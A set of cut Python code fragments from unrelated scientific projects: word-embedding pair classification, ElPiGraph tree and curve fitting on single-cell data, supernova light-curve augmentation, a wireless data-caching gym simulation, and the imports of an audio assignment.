if (vec.shape[0] == self.vecs.dim):
return vec, 1, 1
else: # word not in vocab
sum = torch.zeros(self.vecs.dim)
words = compound_word.split(' ')
tok_count = len(words)
toks_found = 0
for w in words:
w_vec, w_found = self.vecOrEmpty(w)
sum = sum + w_vec
toks_found = toks_found + w_found
return sum / len(words), tok_count, toks_found
def pairEmbed(self):
def _pairEmbed(dfrow):
par, pt_cnt, pt_fnd = self.avg_vec(dfrow[0])
chi, ct_cnt, ct_fnd = self.avg_vec(dfrow[1])
#print('par type', type(par))
assert par.shape[0] == self.vecs.dim
assert chi.shape[0] == self.vecs.dim
#vec = torch.cat([par, chi])
#print('pair embed', type(vec))
return torch.cat([par, chi]), pt_cnt + ct_cnt, pt_fnd + ct_fnd
return _pairEmbed
def firstEmbed(self):
def _firstEmbed(dfrow):
return self.avg_vec(dfrow[0])
return _firstEmbed
def load_data(self, tsv_file, dfrow_handler):
"""Loads pair classification data from a TSV file.
By default, we assume each row contains two vocabulary terms followed
by an integer value for the class of the pair.
Returns:
X FloatTensor of n by x*dim for the input pairs
Y LongTensor of n elements
n the number of pairs, i.e. size of the dataset
tok_count number of tokens used to provide the embeddings
minimum value is n*x, but could be higher due to compound words
tok_found number of tokens in the vocabulary
maximum value is tok_count, but can be lower if the
tsv_file contains words ouf of the vocabulary
"""
df = pd.read_csv(tsv_file, header=None, sep='\t')
# print(df.columns.size)
assert(df.columns.size >= 3), 'error'
# extract categories (pytorch takes care of 1-hot encoding)
categories = df.loc[:, 2]
cat_idxs = torch.LongTensor(categories.values)
cat_idxs = cat_idxs
Y = torch.LongTensor(cat_idxs)
# now extract pairs
vec_cnt_fnds = df.apply(dfrow_handler, axis=1)
vecs = vec_cnt_fnds.apply(lambda triple: triple[0])
cnts = vec_cnt_fnds.apply(lambda triple: triple[1])
fnds = vec_cnt_fnds.apply(lambda triple: triple[2])
| |
[Albergante20]_.
epg_mu
Parameter for ElPiGraph, coefficient of ‘bending’ elasticity [Albergante20]_.
epg_trimmingradius
Parameter for ElPiGraph, trimming radius for MSE-based data approximation term [Albergante20]_.
epg_initnodes
numerical 2D matrix, the k-by-m matrix with k m-dimensional positions of the nodes
in the initial step
epg_verbose
show verbose output of epg algorithm
device
Run method on either `cpu` or on `gpu`
plot
Plot the resulting tree.
basis
Basis onto which the resulting tree should be projected.
seed
A numpy random seed.
copy
Return a copy instead of writing to adata.
Returns
-------
adata : anndata.AnnData
if `copy=True` it returns or else add fields to `adata`:
`.uns['epg']`
dictionnary containing information from elastic principal curve
`.obsm['X_R']`
soft assignment of cells to principal points
`.uns['graph']['B']`
adjacency matrix of the principal points
`.uns['graph']['F']`
coordinates of principal points in representation space
"""
logg.info(
"inferring a principal circle",
reset=True,
end=" " if settings.verbosity > 2 else "\n",
)
adata = adata.copy() if copy else adata
if Nodes is None:
if adata.shape[0] * 2 > 100:
Nodes = 100
else:
Nodes = int(adata.shape[0] / 2)
logg.hint(
"parameters used \n"
" "
+ str(Nodes)
+ " principal points, mu = "
+ str(epg_mu)
+ ", lambda = "
+ str(epg_lambda)
)
circle_epg(
adata,
Nodes,
use_rep,
ndims_rep,
init,
epg_lambda,
epg_mu,
epg_trimmingradius,
epg_initnodes,
device,
seed,
epg_verbose,
)
if plot:
plot_graph(adata, basis)
return adata if copy else None
def tree_epg(
X,
Nodes: int = None,
init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
logg.hint(
"parameters used \n"
" "
+ str(Nodes)
+ " principal points, mu = "
+ str(mu)
+ ", lambda = "
+ str(lam)
)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from cuml.metrics import pairwise_distances
from .utils import cor_mat_gpu
Tree = elpigraph.computeElasticPrincipalTree(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Tree[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Tree = elpigraph.computeElasticPrincipalTree(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Tree[0]["NodePositions"])
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Tree[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Tree[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Tree[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(np.unique(np.array(g.clusters().membership))) > 1
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(np.unique(np.array(g.clusters().membership))) > 1
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph = {
"B": B,
"R": R,
"F": Tree[0]["NodePositions"].T,
"tips": tips,
"forks": forks,
"cells_fitted": X.index.tolist(),
"metrics": "euclidean",
}
Tree[0]["Edges"] = list(Tree[0]["Edges"])[0]
return graph, Tree[0]
def curve_epg(
adata: AnnData,
Nodes: int = None,
use_rep: str = None,
ndims_rep: Optional[int] = None,
init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
X, use_rep = get_data(adata, use_rep, ndims_rep)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from .utils import cor_mat_gpu
from cuml.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCurve(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Curve[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCurve(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Curve[0]["NodePositions"])
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Curve[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Curve[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Curve[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(np.unique(np.array(g.clusters().membership))) > 1
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(np.unique(np.array(g.clusters().membership))) > 1
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph = {
"B": B,
"F": Curve[0]["NodePositions"].T,
"tips": tips,
"forks": forks,
"metrics": "euclidean",
"use_rep": use_rep,
"ndims_rep": ndims_rep,
}
Curve[0]["Edges"] = list(Curve[0]["Edges"])[0]
adata.uns["graph"] = graph
adata.uns["epg"] = Curve[0]
adata.obsm["X_R"] = R
logg.info(" finished", time=True, end=" " if settings.verbosity > 2 else "\n")
logg.hint(
"added \n"
" .uns['epg'] dictionnary containing inferred elastic curve generated from elpigraph.\n"
" .obsm['X_R'] hard assignment of cells to principal points.\n"
" .uns['graph']['B'] adjacency matrix of the principal points.\n"
" .uns['graph']['F'], coordinates of principal points in representation space."
)
return adata
def circle_epg(
adata: AnnData,
Nodes: int = None,
use_rep: str = None,
ndims_rep: Optional[int] = None,
init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
X, use_rep = get_data(adata, use_rep, ndims_rep)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from .utils import cor_mat_gpu
from cuml.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCircle(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Curve[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCircle(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Curve[0]["NodePositions"])
# Hard assigment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Curve[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Curve[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Curve[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(tips) > 0
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(tips) > 0
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph = | |
"""
photoz_reference = SPCC_SN_data().get_photoz_reference()
while True:
ref_idx = np.random.choice(len(photoz_reference))
ref_specz, ref_photoz, ref_photoz_err = photoz_reference[ref_idx]
# Randomly choose the order for the difference. Degeneracies work
# both ways, so even if we only see specz=0.2 -> photoz=3.0 in the
# data, the reverse also happens, but we can't get spec-zs at z=3
# so we don't see this.
new_diff = (ref_photoz - ref_specz) * np.random.choice([-1, 1])
# Apply the difference, and make sure that the photoz is > 0.
new_photoz = redshift + new_diff
if new_photoz < 0:
continue
# Add some noise to the error so that the classifier can't focus in
# on it.
new_photoz_err = ref_photoz_err * np.random.normal(1, 0.05)
break
return new_photoz, new_photoz_err
def _choose_target_observation_count(self, augmented_metadata):
"""Choose the target number of observations for a new augmented light
curve.
Implemented for the SPCC dataset
Parameters
==========
augmented_metadata : dict
The augmented metadata
Returns
=======
target_observation_count : int
The target number of observations in the new light curve.
"""
# number of light curve observations in SPCC modelled well with a two-peaked distribution
gauss_choice = np.random.choice(2, p=[0.25,0.75])
if gauss_choice == 0:
mu = 51
sigma = 15
elif gauss_choice == 1:
mu = 110
sigma = 24
target_observation_count = int(np.clip(np.random.normal(mu, sigma), 16, None)) # choose 16 as this is the minimum number of observations in a SPCC light curve
return target_observation_count
def _simulate_light_curve_uncertainties(self, observations, augmented_metadata):
"""Simulate the observation-related noise for a light curve.
Implemented for the SPCC dataset
Parameters
==========
observations : pandas.DataFrame
The augmented observations that have been sampled from a Gaussian
Process. These observations have model flux uncertainties listed
that should be included in the final uncertainties.
augmented_metadata : dict
The augmented metadata
Returns
=======
observations : pandas.DataFrame
The observations with uncertainties added.
"""
observations = observations.copy()
band_noises = {'desg': (1.459, 0.889), 'desr': (0.807, 0.891), 'desi': (1.305, 0.801), 'desz': (1.285, 0.737)}
# Calculate the new noise levels using a lognormal distribution for
# each band.
lognormal_parameters = np.array([band_noises[i] for i in observations['band']])
add_stds = np.random.lognormal(lognormal_parameters[:, 0], lognormal_parameters[:, 1])
noise_add = np.random.normal(loc=0.0, scale=add_stds)
observations['flux'] += noise_add
observations['flux_error'] = np.sqrt(observations['flux_error']**2 + add_stds**2)
# for not including GP error:
#observations['flux_error'] = abs(add_stds)
return observations
def _simulate_detection(self, observations, augmented_metadata):
"""Simulate the detection process for a light curve.
Parameters
==========
observations : pandas.DataFrame
The augmented observations that have been sampled from a Gaussian
Process.
augmented_metadata : dict
The augmented metadata
Returns
=======
observations : pandas.DataFrame
The observations with the detected flag set.
pass_detection : bool
Whether or not the full light curve passes the detection thresholds
used for the full sample.
"""
s2n = np.abs(observations['flux']) / observations['flux_error']
prob_detected = (erf((s2n - 5.5) / 2) + 1) / 2.
observations['detected'] = np.random.rand(len(s2n)) < prob_detected
pass_detection = np.sum(observations['detected']) >= 2
return observations, pass_detection
def _choose_sampling_times(self, reference_object, augmented_metadata, max_time_shift=50, window_padding=100, drop_fraction=0.1):
"""Choose the times at which to sample for a new augmented object.
Implemented for the SPCC dataset. No need to drop large observation blocks.
Parameters
==========
reference_object : :class:`AstronomicalObject`
The object to use as a reference for the augmentation.
augmented_metadata : dict
The augmented metadata
max_time_shift : float (optional)
The new sampling times will be shifted by up to this amount
relative to the original ones.
window_padding : float (optional)
Observations outside of a window bounded by the first and last
observations in the reference objects light curve with a padding
specified by this parameter will be dropped.
drop_fraction : float (optional)
This fraction of observations will always be dropped when creating
the augmented light curve.
Returns
=======
sampling_times : pandas Dataframe
A pandas Dataframe that has the following columns:
- time : the times of the simulated observations.
- band : the bands of the simulated observations.
- reference_time : the times in the reference light curve that
correspond to the times of the simulated observations.
"""
# Figure out the target number of observations to have for the new
# lightcurve.
target_observation_count = self._choose_target_observation_count(augmented_metadata)
# Start with a copy of the original times and bands.
reference_observations = reference_object.observations
sampling_times = reference_observations[['time', 'band']].copy()
sampling_times['reference_time'] = sampling_times['time'].copy()
start_time = np.min(sampling_times['time'])
end_time = np.max(sampling_times['time'])
# If the redshift changed, shift the time of the observations.
augmented_redshift = augmented_metadata['redshift']
reference_redshift = reference_object.metadata['host_specz']
redshift_scale = (1 + augmented_redshift) / (1 + reference_redshift)
if augmented_redshift != reference_redshift:
# Shift relative to an approximation of the peak flux time so that
# we generally keep the interesting part of the light curve in the
# frame.
ref_peak_time = reference_observations['time'].iloc[np.argmax(reference_observations['flux'].values)]
sampling_times['time'] = (ref_peak_time + redshift_scale * (sampling_times['time'] - ref_peak_time))
# Shift the observations forward or backward in time by a small
# amount.
sampling_times['time'] += np.random.uniform(-max_time_shift, max_time_shift)
# Drop observations that are outside of the observing window after all
# of these procedures. We leave a bit of a buffer to get better
# baselines for background estimation.
sampling_times = sampling_times[(sampling_times['time'] > start_time - window_padding).values & (sampling_times['time'] < end_time + window_padding).values].copy()
# At high redshifts, we need to fill in the light curve to account for
# the fact that there is a lower observation density compared to lower
# redshifts.
num_fill = int(target_observation_count * (redshift_scale - 1))
if num_fill > 0:
new_indices = np.random.choice(sampling_times.index, num_fill, replace=True)
new_rows = sampling_times.loc[new_indices]
# Choose new bands randomly.
new_rows['band'] = np.random.choice(reference_object.bands, num_fill, replace=True)
sampling_times = pd.concat([sampling_times, new_rows])
# Drop back down to the target number of observations. Having too few
# observations is fine, but having too many is not. We always drop at
# least 10% of observations to get some shakeup of the light curve.
num_drop = int(max(len(sampling_times) - target_observation_count, drop_fraction * target_observation_count))
drop_indices = np.random.choice(sampling_times.index, num_drop, replace=False)
sampling_times = sampling_times.drop(drop_indices).copy()
sampling_times.reset_index(inplace=True, drop=True)
return sampling_times
def _resample_light_curve(self, reference_object, augmented_metadata):
"""Resample a light curve as part of the augmenting procedure
This uses the Gaussian process fit to a light curve to generate new
simulated observations of that light curve.
In some cases, the light curve that is generated will be accidentally
shifted out of the frame, or otherwise missed. If that is the case, the
light curve will automatically be regenerated with the same metadata
until it is either detected or until the number of tries has exceeded
settings['augment_retries'].
Parameters
----------
reference_object : :class:`AstronomicalObject`
The object to use as a reference for the augmentation.
augmented_metadata : dict
The augmented metadata
Returns
-------
augmented_observations : pandas.DataFrame
The simulated observations for the augmented object. If the chosen
metadata leads to an object that is too faint or otherwise unable
to be detected, None will be returned instead.
"""
gp = reference_object.get_default_gaussian_process()
# Figure out where to sample the augmented light curve at.
observations = self._choose_sampling_times(reference_object, augmented_metadata)
# Compute the fluxes from the GP at the augmented observation
# times.
new_redshift = augmented_metadata['redshift']
reference_redshift = reference_object.metadata['host_specz']
redshift_scale = (1 + new_redshift) / (1 + reference_redshift)
new_wavelengths = np.array([band_central_wavelengths[i] for i in observations['band']])
eval_wavelengths = new_wavelengths / redshift_scale
pred_x_data = np.vstack([observations['reference_time'], eval_wavelengths]).T
new_fluxes, new_fluxvars = gp(pred_x_data, return_var=True)
observations['flux'] = new_fluxes
observations['flux_error'] = np.sqrt(new_fluxvars)
# Update the brightness of the new observations. If the
# 'augment_brightness' key is in the metadata, we add that in
# magnitudes to the augmented object.
augment_brightness = augmented_metadata.get('augment_brightness', 0)
adjust_scale = 10**(-0.4*augment_brightness)
# All objects in spcc are extragalactic - adjust brightness following
# the Hubble diagram.
delta_distmod = (self.cosmology.distmod(reference_redshift) - self.cosmology.distmod(new_redshift)).value
adjust_scale *= 10**(0.4*delta_distmod)
observations['flux'] *= adjust_scale
observations['flux_error'] *= adjust_scale
# Save the model flux and flux error
observations['model_flux'] = observations['flux']
observations['model_flux_error'] = observations['flux_error']
# Add in light curve noise. This is survey specific and must be
# implemented in subclasses.
observations = self._simulate_light_curve_uncertainties(observations, augmented_metadata)
# Simulate detection
observations, pass_detection = self._simulate_detection(observations, augmented_metadata)
# If our light curve passes detection thresholds, we're done!
if pass_detection:
return observations
# Failed to | |
<filename>gym-dataCachingCoding/gym_dataCachingCoding/envs/simulation_entities.py<gh_stars>0
import numpy as np
import math
import scipy.io
#import matplotlib.pyplot as plot
#from matplotlib.animation import FuncAnimation
class Buffer_Object(object):
def __init__(self, size = 4, destinations = 5):
"""
This initialises a data buffer, from which the sender will select between
size: integar, the length of the buffer
destinations: integar, the number of possible recipients.
"""
self.size = size
self.destinations = destinations
self.data_packets = np.array([np.linspace(20,20,8),np.linspace(100,100,8)]) # Was np.linspace(200,200,8)
self.data_unit_size = 1 # size of one data unit
self.data_packets_num = self.data_packets / self.data_unit_size
self.data_deadline = np.array([np.linspace(2,2,8),np.linspace(20,20,8)]) #set deadlines corresponding to job size
#same as above but includes a 0 size item, to indicate no job to send
self.data = np.concatenate([np.array([0]),self.data_packets_num.flatten()])
self.fill_buffer(first_run = True)
# record lost jobs due to 'stays too long in the buffer'
#?
self.lost_table = []
# a parameter used in calculating deadline reward
self.ddl_reward_par = 8.0
def gen_item(self):
"""
This generates jobs and deadlines for adding to the buffer
p is the probability of the choice of different size packets
"""
row = np.random.choice([0,1], p = [0.5,0.5])
column = np.random.choice(list(range(8)))
return self.data_packets_num[row,column], self.data_deadline[row,column]
# def gen_deadline(self, data_size):
# """
# This generates deadlines given job size.
# """
# if data_size % 1000 == 0:
# ddl = 15.0 + data_size/1000 - 1
# elif data_size % 10 == 0:
# ddl = 5.0 + data_size/10 - 1
# return ddl
def fill_buffer(self, first_run = False):
"""
this fills the buffer
The items are appended with the following values
[size, dest, time_since_request, deadline]
Todo: figure out when to do this
"""
if first_run:
self.buffer = []
for i in range(self.size - len(self.buffer)):
dest = np.random.choice(list(range(self.destinations)))
size, deadline = self.gen_item()
self.buffer.append([size, dest, deadline, size])
# self.buffer.append([size,dest,0,deadline])
def view_buffer(self):
"""
This function allows for easier representation of the state to the agent.
the np.vectorize thing, is to allow a function to be applied to a numpy array.
This effectively scales our 16 different jobs sizes, plus job size 0, to a value between 0 and 16
Potential change, change the values to be binary??
"""
cp_buffer = np.array(self.buffer.copy()) #make a copy of the buffer so I don't corrupt it
cp_buffer = cp_buffer[:,0:3]
# v_scale = np.vectorize(lambda value: np.where(self.data == value)[0][0]) #vectorized function
#scale every item in the buffer to [0,1] - designed for multiple job sizes
cp_buffer[:,0] = cp_buffer[:,0] / np.max(self.data)
cp_buffer[:,1] = cp_buffer[:,1] / (self.destinations-1)
cp_buffer[:,2] = cp_buffer[:,2] / np.max(self.data_deadline.flatten())
# cp_buffer[:,3] = cp_buffer[:,3] / np.max(self.data_deadline.flatten())
# cp_buffer[:,4] = cp_buffer[:,4] / v_scale(cp_buffer[:,4]) / 16.0
return cp_buffer.flatten()
def update(self, job_finished, job_from, time_elapsed = 0.002 ):
"""
This function increments the time waited value, and removes jobs that have exceeded this deadline or have
been assigned. It also refills the buffer
-------
Later
Action: Update job in RAT
Time elapse
Deadline: remove
Refill buffer
"""
exceed_deadline = 0
finished_jobs = 0
#?
finished_job_size = []
exceed_deadline_size = []
to_remove = []
# update jobs in the buffer after transmission
for ii in range(len(job_from)):
idx = job_from[ii]
self.buffer[idx][0] -= 1
for i in range(len(self.buffer)): #iterate through buffer
self.buffer[i][2] -= time_elapsed #increment time waited
if self.buffer[i][0] <= 0:
to_remove.append(i)
finished_jobs += 1
finished_job_size.append(self.buffer[i][3])
elif self.buffer[i][2] <= 0:
exceed_deadline += 1 #track that it's due to be removed
to_remove.append(i) #add it to a list to allow for removal at end of function
exceed_deadline_size.append(self.buffer[i][3]) # record size of jobs being removed
for i in to_remove[::-1]: #run backwards through the list of jobs to be removed. Backwards to avoid indexing error.
self.remove_item(i) #call removal function
self.fill_buffer() #refill the buffer
return finished_jobs, exceed_deadline, finished_job_size, exceed_deadline_size #report the number of jobs that exceeded deadline
def remove_item(self,i):
"""
remove item from list, if it has been placed into one of the RAT
"""
del self.buffer[i]
def to_be_removed(self, i):
"""
This function is used when a job has been succesfully assigned. It is represented by the size being set to 0
"""
self.buffer[i][0]=0
# def waiting_time_reward(self, waiting_time):
# """
# This is the penalization for job waited in the buffer (also in the RATs).
# Assume wating time is x, y is a constant for contronling the value
# r = -e^(x - y)
# y could be tuned
# """
# if waiting_time == 0:
# reward = 0
# else:
# reward = -0.5 * waiting_time
# # reward = -1.1**(waiting_time - self.ddl_reward_par)
# # reward = -math.exp(waiting_time - self.ddl_reward_par)
# return reward
class BaseStation(object):
def __init__(self, vehicles = 5, I2V = True):
if I2V:
self.buffer = Buffer_Object(size = 5)
self.vehicles = vehicles
self.RATs = {
0: {'job': [], 'free' : True, 'from': 999},
1: {'job': [], 'free' : True, 'from': 999},
}
self.load_RAT_spec()
self.time = 0.0
# record finished jobs:[size]; lost jobs: [size]
self.finished_table = []
self.lost_table_r = [] # lost jobs because of out of the range of RAT
self.lost_table_d = [] # lost jobs due to deadline
# cur_RATs: label = 0: start status; label = 1: finished; label = 2: lost
self.cur_RATs = {
0: {'job': []},
1: {'job': []},
}
def load_RAT_spec(self):
"""
Load the matlab lists which indicate data rate and distance into a dicitionary
for easy access later
"""
linkBudget_lte = scipy.io.loadmat('lte.mat')
lte = linkBudget_lte['lte']
linkBudget_mmWaves = scipy.io.loadmat('mmWaves.mat')
mmWaves = linkBudget_mmWaves['mmWaves']
# data rate: in Mb
self.RAT_info = {
0:{'name':'LTE','dist': lte[0][0][0][0],
'datarate':lte[0][0][1][0]/ 1e6,'res':0,
'max_range': np.max(lte[0][0][0][0])},
1:{'name':'mmWave','dist': mmWaves[0][0][0][0],
'datarate':mmWaves[0][0][1][0]/ 1e6,'res':1,
'max_range': np.max(mmWaves[0][0][0][0])}
}
self.RAT_info[0]['data_index'] = np.concatenate([np.array([0]),np.unique(self.RAT_info[0]['datarate'])])
self.RAT_info[1]['data_index'] = np.concatenate([np.array([0]),np.unique(self.RAT_info[1]['datarate'])])
def add_job(self, RAT, index):
"""
Append job to RAT specified.
RAT: 0 or 1, either lte or mmwave
index: index of item in buffer
"""
row=index # In case of choosing an action that is not in buffer destination ( in RL training) This is never needed in heurustic method
for idx in range(5):
if self.buffer.buffer[idx][1]== index:
row=idx
########### ERROR was here #############
item = self.buffer.buffer[row].copy() # instead of veh number it adds job to the row number ## was index
item[0] = 1 * self.buffer.data_unit_size # add one unit to RAT every time
success = False
if self.RATs[RAT]['free']:
self.RATs[RAT]['job'] = item
self.RATs[RAT]['from'] = index # where this unit comes from
self.RATs[RAT]['free'] = False
success = True
# add the job size for record
#?
self.cur_RATs[RAT]['job'] = self.RATs[RAT]['job'][0]
return success
def update(self, distances, time_elapsed = 0.002):
"""
This updates the base station entity. It does a number of things including update a time variable.
It updates the jobs progress in transmission (which includes checking for inability to send and
also checking if jobs in the buffer have exceeded the available time)
"""
self.time += time_elapsed
job_finished, job_from = self.update_jobs(distances, time_elapsed = time_elapsed)
finished_jobs, exceed_deadlines, finished_size, exceed_ddl_size = self.buffer.update(
job_finished, job_from, time_elapsed = time_elapsed)
return finished_jobs, exceed_deadlines, finished_size, exceed_ddl_size
def update_jobs(self, distances ,time_elapsed = 0.002):
"""
Transmit some of the data and then return the amount of data that has been transmitted
arguments:
distances - dictionary, an np.array of all of the distances to the vehicles, for LTE and mmWaves RATs.
time_elapsed - float, a real number. Time that has elapsed.
operation:
goes through the items in the RATs and calculates the amount of data that has been sent.
Things to consider:
One problem is it assumes the data rate now has been the data rate since time elapsed. This should be changed.
"""
data_tx = {i:0 for i in range(self.vehicles)}
idx = 0
RATs=[1,0] #mmWave priority
#for i in self.RATs.keys():
for i in RATs:
if not self.RATs[i]['free']: #if the RAT isn't free there is a job
size_before = self.RATs[i]['job'][0] #the size of the job
dest = self.RATs[i]['job'][1] #the destination of the job
distance = np.round(distances[list(distances.keys())[idx]][dest],self.RAT_info[i]['res'])#job rounded w.r to RAT
if distance > self.RAT_info[i]['max_range']: #if out of range
data_rate = 0 #there is no service, so the data rate is 0
self.RATs[i]['job'] = [] #therefore, we drop the job
self.RATs[i]['free'] = True #and change the status of the RAT
else: #in range
data_rate = self.RAT_info[i]['datarate'][np.where(self.RAT_info[i]['dist']==distance)[0][0]] #calculate | |
<filename>A6/A6Part4.py<gh_stars>0
import os
import sys
import numpy as np
import math
from scipy.signal import get_window
import matplotlib.pyplot as plt
